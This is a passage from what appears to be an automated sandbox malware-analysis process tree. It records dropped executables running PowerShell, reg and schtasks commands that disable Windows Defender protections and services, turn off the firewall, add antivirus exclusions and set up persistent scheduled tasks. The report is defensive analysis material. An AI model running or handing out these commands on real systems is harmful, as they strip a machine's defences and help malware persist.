                                                                                      • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:1048
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\771043f8.bat" "
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:3108
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            6⤵
                                                                                              PID:4484
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4916
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3416
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3760
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2020
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4888
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:5052
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3344
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1896
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2268
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4980
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2868
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3424
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4268
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3572
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4684
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1928
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4676
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                              6⤵
                                                                                                PID:3708
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4896
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                6⤵
                                                                                                  PID:5096
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                5⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2868
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                  6⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:3708
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                5⤵
                                                                                                  PID:5156
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                  5⤵
                                                                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                  PID:5180
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                  5⤵
                                                                                                    PID:5196
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                    5⤵
                                                                                                      PID:5228
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:5256
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:5280
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:5308
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:5332
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                                                      PID:5360
                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                      5⤵
                                                                                                        PID:5384
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                        5⤵
                                                                                                          PID:5416
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                          5⤵
                                                                                                            PID:5444
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                            5⤵
                                                                                                              PID:5476
                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                              reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                              5⤵
                                                                                                                PID:5504
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                5⤵
                                                                                                                  PID:5532
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                  5⤵
                                                                                                                    PID:5556
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                    5⤵
                                                                                                                      PID:5576
                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                      5⤵
                                                                                                                        PID:5620
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                        5⤵
                                                                                                                          PID:5644
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                          5⤵
                                                                                                                            PID:5676
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                            5⤵
                                                                                                                              PID:5708
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                              5⤵
                                                                                                                                PID:5732
                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                5⤵
                                                                                                                                  PID:5764
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                  5⤵
                                                                                                                                    PID:5796
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                    5⤵
                                                                                                                                      PID:5812
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies Security services
                                                                                                                                      PID:5856
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies Security services
                                                                                                                                      PID:5876
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies Security services
                                                                                                                                      PID:5908
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies Security services
                                                                                                                                      PID:5948
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                                                      5⤵
                                                                                                                                      • Modifies security service
                                                                                                                                      PID:5972
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                  3⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2300
                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                  "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                  3⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:2936
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2524
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                    4⤵
                                                                                                                                    • Checks computer location settings
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2956
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\045b1cb4.bat" "
                                                                                                                                      5⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6040
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        6⤵
                                                                                                                                          PID:3240
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:1004
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:3620
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                      3⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Drops startup file
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:464
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                        4⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:4336
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                        4⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3572
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                        4⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3512
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          5⤵
                                                                                                                                            PID:3884
                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:5052
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                      2⤵
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:780
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                        3⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:2988
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                          4⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:4940
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\07c45773.bat" "
                                                                                                                                            5⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:5444
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              6⤵
                                                                                                                                                PID:5604
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C14C.tmp\C14D.tmp\C14E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:2228
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4676
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5032
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4684
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3884
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3288
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4872
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5084
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2300
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3736
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5032
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:5052
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3832
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1520
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2292
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:964
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                              5⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3564
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                6⤵
                                                                                                                                                  PID:2112
                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:1520
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2900
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell.exe -command "netsh advfirewall set allprofiles state off"
